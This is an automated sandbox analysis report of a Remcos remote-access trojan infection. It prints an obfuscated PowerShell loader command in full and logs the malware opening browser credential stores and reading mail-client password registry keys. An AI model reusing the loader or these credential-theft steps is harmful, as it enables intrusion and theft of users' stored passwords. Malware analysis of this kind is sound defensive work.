spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv Jump to behavior
Source: wab.exe, 00000009.00000003.2355239700.0000000006621000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000009.00000003.2367616246.000000000662C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2362636441.000000000662C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2423203936.000000000662C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 13_2_0041881C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 14_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 14_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 14_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 14_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 7828, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU Jump to behavior
Source: Yara match File source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs